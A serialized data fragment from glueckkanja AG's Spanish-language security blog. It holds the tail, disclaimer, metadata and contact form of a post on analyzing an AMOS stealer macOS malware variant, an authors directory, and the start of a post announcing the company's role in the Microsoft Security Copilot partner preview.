temporal del atacante puede transformarse en una desventaja, protegiendo a nuestros clientes incluso antes de que el sector haya reconocido la amenaza.",[22,2107],{},[2109,2110,2111,2116,2119,2122],"blockquote",{},[12,2112,2113],{},[251,2114,2115],{},"Nota sobre privacidad de datos",[12,2117,2118],{},"La información identificativa ha sido anonimizada en esta publicación. Detalles técnicos específicos, indicadores y marcas de tiempo pueden haber sido ligeramente alterados para garantizar la protección continuada del entorno afectado, manteniendo al mismo tiempo la integridad técnica íntegra del análisis.",[12,2120,2121],{},"El análisis técnico y los indicadores de compromiso (IOC) incluidos en este informe tienen fines ilustrativos y educativos únicamente. Esta información se proporciona \"en la medida de lo posible\". glueckkanja AG no ofrece garantías, expresas ni implícitas, sobre la integridad o exactitud de los datos y no se hace responsable de daños, pérdidas o incidentes de seguridad derivados del uso o la implementación de la información, reglas o firmas aquí compartidas. Se recomienda encarecidamente a los usuarios que validen todos los indicadores y reglas en un entorno controlado antes de su despliegue.",[12,2123,2124],{},"Los indicadores y técnicas descritos pueden solaparse con familias de malware conocidas y no son exclusivos de una única campaña.",[2126,2127,2128],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}",{"title":65,"searchDepth":111,"depth":111,"links":2130},[2131,2132,2133,2134,2141,2142,2143,2144,2152,2159],{"id":43,"depth":111,"text":44},{"id":85,"depth":111,"text":86},{"id":146,"depth":111,"text":147},{"id":178,"depth":111,"text":179,"children":2135},[2136,2137,2138,2139,2140],{"id":188,"depth":329,"text":189},{"id":203,"depth":329,"text":204},{"id":217,"depth":329,"text":218},{"id":226,"depth":329,"text":227},{"id":243,"depth":329,"text":244},{"id":409,"depth":111,"text":410},{"id":499,"depth":111,"text":500},{"id":615,"depth":111,"text":616},{"id":686,"depth":111,"text":687,"children":2145},[2146,2147,2148,2149,2150,2151],{"id":701,"depth":329,"text":702},{"id":993,"depth":329,"text":994},{"id":1247,"depth":329,"text":1248},{"id":1441,"depth":329,"text":1442},{"id":1528,"depth":329,"text":1529},{"id":1681,"depth":329,"text":1682},{"id":1735,"depth":111,"text":1736,"children":2153},[2154,2155,2156,2157,2158],{"id":1751,"depth":329,"text":1752},{"id":1817,"depth":329,"text":1818},{"id":1859,"depth":329,"text":1860},{"id":1899,"depth":329,"text":1900},{"id":1927,"depth":329,"text":1928},{"id":1941,"depth":111,"text":1942,"children":2160},[2161,2162,2163,2164],{"id":1961,"depth":329,"text":1962},{"id":1975,"depth":329,"text":1976},{"id":1989,"depth":329,"text":1990},{"id":2003,"depth":329,"text":2004},null,"md",false,"post",{"lang":2170,"seoTitle":2171,"titleClass":2172,"date":2173,"categories":2174,"blogtitlepic":2176,"socialimg":2177,"customExcerpt":2178,"keywords":2179,"maxContent":2180,"asideNav":2181,"footer":2197,"contactInContent":2198,"published":2180,"hreflang":2255},"es","Variante AMOS Stealer: Ingeniería inversa de un malware macOS desconocido — Del incidente a la inteligencia","h2-font-size","2026-04-10",[2175],"Security","head-amos-stealer.png","/blog/heads/head-amos-stealer.png","Una variante de AMOS stealer no documentada previamente comprometió un endpoint macOS. Sin hashes conocidos, sin datos de C2 en ninguna base de datos pública. Nuestro SOC desmanteló seis capas de ofuscación, extrajo todos los indicadores y distribuyó la protección a todos los clientes SOC en cuestión de horas, antes de que el sector hubiera visto siquiera la muestra.","AMOS stealer, malware macOS, ingeniería inversa, análisis de malware, Ghidra, ARM64, respuesta a incidentes, threat intelligence, CSOC, seguridad macOS, stealer malware, shared threat intelligence, atomic macOS stealer",true,{"menuItems":2182},[2183,2186,2189,2192,2194],{"href":2184,"text":2185},"#el-incidente-un-escenario-con-ioc-desconocido","El incidente",{"href":2187,"text":2188},"#stage-1-comprobaciones-de-sandbox","Stage 1: Sandbox",{"href":2190,"text":2191},"#stage-2-ingenieria-inversa-del-binario-helper","Stage 2: Análisis binario",{"href":2193,"text":2046},"#la-puerta-trasera",{"href":2195,"text":2196},"#el-poder-del-escudo-colectivo-nuestra-plataforma-de-shared-threat-intelligence","Shared Threat Intelligence",{"noMargin":2180},{"quote":2180,"infos":2199},{"bgColor":2200,"headline":2201,"subline":2202,"level":41,"textStyling":2203,"flush":2204,"person":2205,"form":2211},"var(--color-blue-dark)","Contactadnos","¿Queréis saber cómo nuestra plataforma de Shared Threat Intelligence os protege frente a variantes de malware desconocidas antes de que el sector las detecte? Hablemos.","text-light","justify-content-end",{"image":2206,"cloudinary":2180,"alt":2207,"name":2208,"quotee":2208,"quoteeTitle":2209,"quote":2210},"/people/people-jan-geisbauer-csoc.jpg","Retrato de Jan Geisbauer, Head of Security en glueckkanja","Jan Geisbauer","Head of Security","Lo peligroso de esta variante no era la complejidad técnica, por impresionante que sea. Lo peligroso era la ventana de tiempo. Sin Shared Threat Intelligence, nuestros otros clientes habrían estado expuestos durante horas mientras todavía analizábamos.",{"ctaText":2212,"cta":2213,"method":2168,"action":2215,"fields":2216},"Enviar",{"skin":2214},"primary is-light","/es/successful",[2217,2221,2225,2229,2234,2239,2242,2245,2248,2251,2253],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2220},"Nombre*","name","Por favor, introducid vuestro nombre.",{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":2224},"Empresa*","company","Por favor, introducid vuestra empresa.",{"label":2226,"type":2227,"id":2227,"required":2180,"requiredMsg":2228},"Dirección de correo electrónico*","email","Por favor, introducid vuestra dirección de correo.",{"label":2230,"type":2231,"id":2232,"required":2167,"requiredMsg":2233},"Vuestro mensaje","textarea","message","Por favor, introducid un mensaje.",{"label":2235,"type":2236,"id":2237,"required":2180,"requiredMsg":2238},"Vuestros datos se almacenarán con nosotros con el fin de procesar y responder a vuestra consulta. Para más información sobre protección de datos, consultad nuestra \u003Ca href=\"/es/privacy\">Política de privacidad\u003C/a>.","checkbox","dataprotection","Por favor, confirmad",{"type":2240,"id":2241,"value":2175},"hidden","_topic",{"type":2240,"id":2243,"value":2244},"_location","World",{"type":2240,"id":2246,"value":2247},"_subject","Form: Blog AMOS Stealer CSOC | ES",{"type":2240,"id":2249,"value":2250},"inbox_key","gkgab-contact-form",{"type":2240,"id":2252},"_gotcha",{"type":2240,"id":2254},"jsonData",[2256,2259,2262],{"lang":2257,"href":2258},"en","/en/posts/2026-04-10-incident-to-intelligence",{"lang":2260,"href":2261},"de","/de/posts/2026-04-10-incident-to-intelligence",{"lang":2170,"href":2263},"/es/posts/2026-04-10-incident-to-intelligence","/posts/2026-04-10-incident-to-intelligence",{"title":5,"description":14},"posts/2026-04-10-incident-to-intelligence",[2268,2269,2270,2271,2272],"Threat Intelligence","Incident Response","macOS Security","Malware Analysis","Cyber Security Operations Center","ah97iBmtBAajZp8HBFLvd3hjAnO1zFgUdiCt4e6JYew",{"id":2275,"extension":2276,"meta":2277,"stem":2611,"__hash__":2612},"authors_data/authors.json","json",{"path":2278,"Alexander Schlindwein":2279,"Sophie Luna":2285,"Nadine Kern":2293,"Karsten Kleinschmidt":2300,"Julian Wendt":2306,"Holger Bunkradt":2311,"Ralf Mania":2317,"Oliver Kieselbach":2323,"Steffen Schwerdtfeger":2329,"Gunnar Winter":2337,"Jan Petersen":2342,"Thorsten Kunzi":2347,"Moritz Pohl":2351,"Thorben Pöschus":2356,"Christoph Hannebauer":2362,"Marco Scheel":2366,"Christopher Brumm":2371,"Florian Klante":2378,"Niklas Bachmann":2383,"Nils Krautkrämer":2388,"Patrick Treptau":2394,"Peter Beckendorf":2399,"Patrick Sobau":2404,"Jörg Wunderlich":2409,"Michael Breither":2413,"Christian Kanja":2418,"Zeba Hoffmann":2424,"Jochen Fröhlich":2429,"Jan Geisbauer":2433,"Gerrit Reinke":2444,"Christian Kordel":2450,"Stephan Wälde":2454,"Carolin Kanja":2459,"Adrian Ritter":2465,"Marvin Bangert":2470,"Thorsten Pickhan":2476,"Christian Lorenz":2482,"Denis Böhm":2487,"Fabian Bader":2492,"Juan Jose Fernandez Perez":2498,"Mahschid Sayyar":2503,"Benjamin Dassow":2508,"Markus Walschburger":2513,"Jonathan Haist":2518,"Daniel Rohregger":2523,"Thomas Naunheim":2528,"Florian Stöckl":2533,"Pascal Asch":2538,"Markus Kättner":2542,"Anna Ulbricht":2549,"body":2556,"title":2610,"Thorben Poeschus":2356,"Nils Krautkraemer":2388,"Joerg Wunderlich":2409,"Jochen Froehlich":2429,"Stephan Waelde":2454,"Denis Boehm":2487,"Florian Stoeckl":2533,"Markus Kaettner":2542},"/authors",{"display_name":2280,"avatar":2281,"permalink":2282,"twitter":2283,"linkedin":2284},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":2286,"avatar":2287,"permalink":2288,"twitter":2289,"linkedin":2290,"imageOffsetLeft":2291,"imageOffsetTop":2292},"Sophie Luna","c_thumb,h_1600,w_1600/people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":2294,"avatar":2295,"permalink":2296,"twitter":2297,"linkedin":2298,"imageOffsetTop":2299},"Nadine Kern","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","72%",{"display_name":2301,"avatar":2302,"permalink":2303,"twitter":2304,"linkedin":2305},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":2307,"avatar":2308,"permalink":2309,"linkedin":2310},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":2312,"avatar":2313,"permalink":2314,"linkedin":2315,"twitter":2316},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":2318,"avatar":2319,"permalink":2320,"linkedin":2321,"twitter":2322},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":2324,"avatar":2325,"permalink":2326,"linkedin":2327,"twitter":2328},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":2330,"avatar":2331,"permalink":2332,"linkedin":2333,"twitter":2334,"imageOffsetTop":2335,"imageOffsetLeft":2336},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":2338,"avatar":2339,"permalink":2340,"twitter":2289,"linkedin":2341},"Gunnar Winter","c_thumb,h_1600,w_1600/people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":2343,"avatar":2344,"permalink":2345,"twitter":2289,"linkedin":2346},"Jan Petersen","c_thumb,h_1600,w_1600/people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":2348,"avatar":2349,"permalink":2350,"twitter":2289,"linkedin":2341,"imageOffsetTop":2299},"Thorsten Kunzi","c_thumb,h_1600,w_1600/people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":2352,"avatar":2353,"permalink":2354,"twitter":2289,"linkedin":2355},"Dr. Moritz Pohl","c_thumb,h_1600,w_1600/people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":2357,"avatar":2358,"permalink":2359,"twitter":2360,"linkedin":2361},"Thorben Pöschus","c_thumb,h_1600,w_1600/people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":2363,"avatar":2364,"permalink":2365,"twitter":2289,"linkedin":2341,"imageOffsetTop":2299},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":2367,"avatar":2368,"permalink":2369,"twitter":2370,"linkedin":2370},"Marco Scheel","c_thumb,h_1600,w_1600/people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":2372,"avatar":2373,"permalink":2374,"twitter":2375,"linkedin":2376,"imageOffsetTop":2377},"Christopher Brumm","c_thumb,h_1600,w_1600/people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":2379,"avatar":2380,"permalink":2381,"linkedin":2382,"twitter":2289},"Florian Klante","c_thumb,h_1600,w_1600/people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":2384,"avatar":2385,"permalink":2386,"linkedin":2387,"twitter":2289},"Niklas Bachmann","c_thumb,h_1600,w_1600/people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":2389,"avatar":2390,"permalink":2391,"twitter":2392,"linkedin":2393},"Nils Krautkrämer","c_thumb,h_1600,w_1600/people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":2395,"avatar":2396,"permalink":2397,"linkedin":2398,"twitter":2289},"Patrick Treptau","c_thumb,h_1600,w_1600/people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":2400,"avatar":2401,"permalink":2402,"linkedin":2403,"twitter":2289,"imageOffsetTop":2299},"Peter Beckendorf","c_thumb,h_1600,w_1600/people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":2405,"avatar":2406,"permalink":2407,"linkedin":2408,"twitter":2289},"Patrick Sobau","c_thumb,h_1600,w_1600/people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":2410,"avatar":2411,"permalink":2412,"twitter":2289},"Jörg Wunderlich","c_thumb,h_1600,w_1600/people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":2414,"avatar":2415,"permalink":2416,"twitter":2289,"linkedin":2417},"Michael Breither","c_thumb,h_1600,w_1600/people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":2419,"avatar":2420,"permalink":2421,"twitter":2422,"linkedin":2423},"Christian Kanja","c_thumb,h_1600,w_1600/people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":2425,"avatar":2426,"permalink":2427,"linkedin":2428,"twitter":2289},"Zeba Hoffmann","c_thumb,h_1600,w_1600/people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":2430,"avatar":2431,"permalink":2432,"twitter":2289,"linkedin":2341},"Jochen Fröhlich","c_thumb,h_1600,w_1600/people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":2208,"avatar":2434,"permalink":2435,"twitter":2436,"linkedin":2436,"imageOffsetTop":2299,"socials":2437},"c_thumb,h_1600,w_1600/people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[2438,2441],{"text":2439,"href":2440},"Blog","https://emptydc.com",{"text":2442,"href":2443},"Podcast","https://hairlessinthecloud.com",{"display_name":2445,"avatar":2446,"permalink":2447,"twitter":2448,"linkedin":2449},"Gerrit Reinke","c_thumb,h_1600,w_1600/people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":2451,"avatar":2452,"permalink":2453,"twitter":2289,"linkedin":2341},"Christian Kordel","c_thumb,h_1600,w_1600/people/christian-kordel.png","/authors/christian-kordel",{"display_name":2455,"avatar":2456,"permalink":2457,"twitter":2458,"linkedin":2341},"Stephan Wälde","c_thumb,h_1600,w_1600/people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":2460,"avatar":2461,"permalink":2462,"twitter":2463,"linkedin":2464},"Carolin Kanja","c_thumb,h_1600,w_1600/people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":2466,"avatar":2467,"permalink":2468,"twitter":2469,"linkedin":2469},"Adrian Ritter","c_thumb,h_1600,w_1600/people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":2471,"avatar":2472,"permalink":2473,"twitter":2474,"linkedin":2475},"Marvin Bangert","c_thumb,h_1600,w_1600/people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":2477,"avatar":2478,"permalink":2479,"twitter":2480,"linkedin":2481},"Thorsten Pickhan","c_thumb,h_1600,w_1600/people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":2483,"avatar":2484,"permalink":2485,"linkedin":2486,"twitter":2289},"Christian Lorenz","c_thumb,h_1600,w_1600/people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":2488,"avatar":2489,"permalink":2490,"linkedin":2491,"twitter":2289},"Denis Böhm","c_thumb,h_1600,w_1600/people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":2493,"avatar":2494,"permalink":2495,"linkedin":2496,"twitter":2497},"Fabian Bader","c_thumb,h_1600,w_1600/people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":2499,"avatar":2500,"permalink":2501,"linkedin":2502},"Juan Jose Fernandez Perez","c_thumb,h_1600,w_1600/people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":2504,"avatar":2505,"permalink":2506,"linkedin":2507},"Mahschid Sayyar","c_thumb,h_1600,w_1600/people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":2509,"avatar":2510,"permalink":2511,"linkedin":2512},"Benjamin Dassow","c_thumb,h_1600,w_1600/people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":2514,"avatar":2515,"permalink":2516,"linkedin":2517},"Markus Walschburger","c_thumb,h_1600,w_1600/people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":2519,"avatar":2520,"permalink":2521,"linkedin":2522,"imageOffsetTop":2299},"Jonathan Haist","c_thumb,h_1600,w_1600/people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":2524,"avatar":2525,"permalink":2526,"linkedin":2527,"imageOffsetTop":2299},"Daniel Rohregger","c_thumb,h_1600,w_1600/people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":2529,"avatar":2530,"permalink":2531,"linkedin":2532,"imageOffsetTop":2377},"Thomas Naunheim","c_thumb,h_1600,w_1600/people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":2534,"avatar":2535,"permalink":2536,"linkedin":2537,"imageOffsetTop":2377},"Florian Stöckl","c_thumb,h_1600,w_1600/people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":7,"avatar":2539,"permalink":2540,"linkedin":2541,"imageOffsetTop":2377},"c_thumb,h_1600,w_1600/people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":2543,"avatar":2544,"permalink":2545,"linkedin":2546,"imageOffsetTop":2547,"imageOffsetLeft":2548},"Markus Kättner","c_thumb,h_1600,w_1600/people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":2550,"avatar":2551,"permalink":2552,"linkedin":2553,"imageOffsetTop":2554,"imageOffsetLeft":2555},"Anna Ulbricht","c_thumb,h_1600,w_1600/people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"Alexander Schlindwein":2557,"Sophie Luna":2558,"Nadine Kern":2559,"Karsten Kleinschmidt":2560,"Julian Wendt":2561,"Holger Bunkradt":2562,"Ralf Mania":2563,"Oliver Kieselbach":2564,"Steffen Schwerdtfeger":2565,"Gunnar Winter":2566,"Jan Petersen":2567,"Thorsten Kunzi":2568,"Moritz Pohl":2569,"Thorben Pöschus":2570,"Christoph Hannebauer":2571,"Marco Scheel":2572,"Christopher Brumm":2573,"Florian Klante":2574,"Niklas Bachmann":2575,"Nils Krautkrämer":2576,"Patrick Treptau":2577,"Peter Beckendorf":2578,"Patrick Sobau":2579,"Jörg Wunderlich":2580,"Michael Breither":2581,"Christian Kanja":2582,"Zeba Hoffmann":2583,"Jochen Fröhlich":2584,"Jan Geisbauer":2585,"Gerrit Reinke":2589,"Christian Kordel":2590,"Stephan Wälde":2591,"Carolin Kanja":2592,"Adrian Ritter":2593,"Marvin Bangert":2594,"Thorsten Pickhan":2595,"Christian Lorenz":2596,"Denis Böhm":2597,"Fabian Bader":2598,"Juan Jose Fernandez Perez":2599,"Mahschid Sayyar":2600,"Benjamin Dassow":2601,"Markus Walschburger":2602,"Jonathan Haist":2603,"Daniel Rohregger":2604,"Thomas Naunheim":2605,"Florian Stöckl":2606,"Pascal Asch":2607,"Markus Kättner":2608,"Anna Ulbricht":2609},{"display_name":2280,"avatar":2281,"permalink":2282,"twitter":2283,"linkedin":2284},{"display_name":2286,"avatar":2287,"permalink":2288,"twitter":2289,"linkedin":2290,"imageOffsetLeft":2291,"imageOffsetTop":2292},{"display_name":2294,"avatar":2295,"permalink":2296,"twitter":2297,"linkedin":2298,"imageOffsetTop":2299},{"display_name":2301,"avatar":2302,"permalink":2303,"twitter":2304,"linkedin":2305},{"display_name":2307,"avatar":2308,"permalink":2309,"linkedin":2310},{"display_name":2312,"avatar":2313,"permalink":2314,"linkedin":2315,"twitter":2316},{"display_name":2318,"avatar":2319,"permalink":2320,"linkedin":2321,"twitter":2322},{"display_name":2324,"avatar":2325,"permalink":2326,"linkedin":2327,"twitter":2328},{"display_name":2330,"avatar":2331,"permalink":2332,"linkedin":2333,"twitter":2334,"imageOffsetTop":2335,"imageOffsetLeft":2336},{"display_name":2338,"avatar":2339,"permalink":2340,"twitter":2289,"linkedin":2341},{"display_name":2343,"avatar":2344,"permalink":2345,"twitter":2289,"linkedin":2346},{"display_name":2348,"avatar":2349,"permalink":2350,"twitter":2289,"linkedin":2341,"imageOffsetTop":2299},{"display_name":2352,"avatar":2353,"permalink":2354,"twitter":2289,"linkedin":2355},{"display_name":2357,"avatar":2358,"permalink":2359,"twitter":2360,"linkedin":2361},{"display_name":2363,"avatar":2364,"permalink":2365,"twitter":2289,"linkedin":2341,"imageOffsetTop":2299},{"display_name":2367,"avatar":2368,"permalink":2369,"twitter":2370,"linkedin":2370},{"display_name":2372,"avatar":2373,"permalink":2374,"twitter":2375,"linkedin":2376,"imageOffsetTop":2377},{"display_name":2379,"avatar":2380,"permalink":2381,"linkedin":2382,"twitter":2289},{"display_name":2384,"avatar":2385,"permalink":2386,"linkedin":2387,"twitter":2289},{"display_name":2389,"avatar":2390,"permalink":2391,"twitter":2392,"linkedin":2393},{"display_name":2395,"avatar":2396,"permalink":2397,"linkedin":2398,"twitter":2289},{"display_name":2400,"avatar":2401,"permalink":2402,"linkedin":2403,"twitter":2289,"imageOffsetTop":2299},{"display_name":2405,"avatar":2406,"permalink":2407,"linkedin":2408,"twitter":2289},{"display_name":2410,"avatar":2411,"permalink":2412,"twitter":2289},{"display_name":2414,"avatar":2415,"permalink":2416,"twitter":2289,"linkedin":2417},{"display_name":2419,"avatar":2420,"permalink":2421,"twitter":2422,"linkedin":2423},{"display_name":2425,"avatar":2426,"permalink":2427,"linkedin":2428,"twitter":2289},{"display_name":2430,"avatar":2431,"permalink":2432,"twitter":2289,"linkedin":2341},{"display_name":2208,"avatar":2434,"permalink":2435,"twitter":2436,"linkedin":2436,"imageOffsetTop":2299,"socials":2586},[2587,2588],{"text":2439,"href":2440},{"text":2442,"href":2443},{"display_name":2445,"avatar":2446,"permalink":2447,"twitter":2448,"linkedin":2449},{"display_name":2451,"avatar":2452,"permalink":2453,"twitter":2289,"linkedin":2341},{"display_name":2455,"avatar":2456,"permalink":2457,"twitter":2458,"linkedin":2341},{"display_name":2460,"avatar":2461,"permalink":2462,"twitter":2463,"linkedin":2464},{"display_name":2466,"avatar":2467,"permalink":2468,"twitter":2469,"linkedin":2469},{"display_name":2471,"avatar":2472,"permalink":2473,"twitter":2474,"linkedin":2475},{"display_name":2477,"avatar":2478,"permalink":2479,"twitter":2480,"linkedin":2481},{"display_name":2483,"avatar":2484,"permalink":2485,"linkedin":2486,"twitter":2289},{"display_name":2488,"avatar":2489,"permalink":2490,"linkedin":2491,"twitter":2289},{"display_name":2493,"avatar":2494,"permalink":2495,"linkedin":2496,"twitter":2497},{"display_name":2499,"avatar":2500,"permalink":2501,"linkedin":2502},{"display_name":2504,"avatar":2505,"permalink":2506,"linkedin":2507},{"display_name":2509,"avatar":2510,"permalink":2511,"linkedin":2512},{"display_name":2514,"avatar":2515,"permalink":2516,"linkedin":2517},{"display_name":2519,"avatar":2520,"permalink":2521,"linkedin":2522,"imageOffsetTop":2299},{"display_name":2524,"avatar":2525,"permalink":2526,"linkedin":2527,"imageOffsetTop":2299},{"display_name":2529,"avatar":2530,"permalink":2531,"linkedin":2532,"imageOffsetTop":2377},{"display_name":2534,"avatar":2535,"permalink":2536,"linkedin":2537,"imageOffsetTop":2377},{"display_name":7,"avatar":2539,"permalink":2540,"linkedin":2541,"imageOffsetTop":2377},{"display_name":2543,"avatar":2544,"permalink":2545,"linkedin":2546,"imageOffsetTop":2547,"imageOffsetLeft":2548},{"display_name":2550,"avatar":2551,"permalink":2552,"linkedin":2553,"imageOffsetTop":2554,"imageOffsetLeft":2555},"Authors","authors","Qkbr0Ywae26Kxloa5JhqFSd0eMg8Ccs9DhjH7FyMzvY",[2614,2678,2723,2851,2958,3027,3100,3284,3442,3774,4078,4214,4292,4456,4566,17022,17231,17372,18155,18319,18491,18627,18750,19571,20139,20750,20813,21128,21353],{"id":2615,"title":2616,"author":2617,"body":2618,"cta":2165,"description":2622,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2660,"moment":2661,"navigation":2180,"path":2672,"seo":2673,"stem":2674,"tags":2675,"webcast":2167,"__hash__":2677},"content_es/posts/2023-11-15-microsoft-security-copilot-partner.md","glueckkanja es uno de los primeros socios de Microsoft Security Copilot",[2460],{"type":9,"value":2619,"toc":2657},[2620,2623,2626,2635,2638,2641,2645,2648,2651,2654],[12,2621,2622],{},"glueckkanja anuncia su participación exclusiva en la Microsoft Security Copilot Partner Private Preview, un reconocimiento pionero a su experiencia de primera clase en tecnologías de seguridad de Microsoft. Seleccionada por su amplia experiencia, mentalidad innovadora y su estrecha y confiable asociación con Microsoft, glueckkanja está al frente de la exploración de funciones de seguridad revolucionarias y en proporcionar retroalimentación significativa sobre tecnologías futuristas.",[12,2624,2625],{},"\"La inteligencia artificial es una de las tecnologías más influyentes de nuestro tiempo y tiene el potencial de lograr avances significativos y fundamentales en la ciberseguridad\", dijo Ann Johnson, Vicepresidenta Corporativa de Desarrollo de Negocios de Seguridad de Microsoft. \"La seguridad es un deporte de equipo, y nos complace trabajar junto con nuestro ecosistema de socios de Security Copilot para entregar soluciones que fortalezcan la ciberdefensa y hagan realidad la promesa de la IA\".",[12,2627,2628,2629],{},"glueckkanja está colaborando con los equipos de productos de Microsoft para ayudar a dar forma al desarrollo del producto Security Copilot en varios aspectos, incluyendo la validación y refinamiento de nuevos escenarios futuros, proporcionando retroalimentación sobre el desarrollo del producto y operaciones para incorporar en futuros lanzamientos del producto, y la validación y retroalimentación de APIs para ayudar en la extensibilidad de Security Copilot. Para saber más, ",[2630,2631,2634],"a",{"href":2632,"target":2633},"https://aka.ms/IgniteFY24SecurityBlogPost","_blank","lea el anuncio.",[12,2636,2637],{},"\"Para un analista, trabajar con Security Copilot es como llevar un exoesqueleto. Todas sus habilidades y conocimientos se ven de repente y enormemente amplificados. Trabajar con contextos complejos se vuelve fácil y se puede hacer en un tiempo sin precedentes. En glueckkanja, nos encanta Security Copilot\", dijo Jan Geisbauer, líder de seguridad en glueckkanja AG.",[12,2639,2640],{},"Security Copilot es el primer producto de seguridad impulsado por IA que permite a los profesionales de seguridad responder rápidamente a amenazas, procesar señales a la velocidad de la máquina y evaluar la exposición al riesgo en minutos. Combina un modelo avanzado de lenguaje extenso (LLM) con un modelo específico de seguridad enriquecido por la única inteligencia global de ciberamenazas de Microsoft y más de 65 billones de señales diarias.",[186,2642,2644],{"id":2643},"acerca-de-glueckkanja","Acerca de glueckkanja",[12,2646,2647],{},"glueckkanja, un destacado proveedor de servicios gestionados en la nube, es un socio principal de Microsoft que ofrece soluciones integrales en la nube. Con un enfoque unificado de planificación, glueckkanja utiliza la infraestructura como código para trasladar y apoyar las infraestructuras de los clientes en la nube.",[12,2649,2650],{},"Con un enfoque en la operación segura y fiable de soluciones de Workplace, servicios de Azure e infraestructuras de seguridad, glueckkanja atiende tanto a empresas medianas como grandes. El Centro de Operaciones de Seguridad en la Nube de 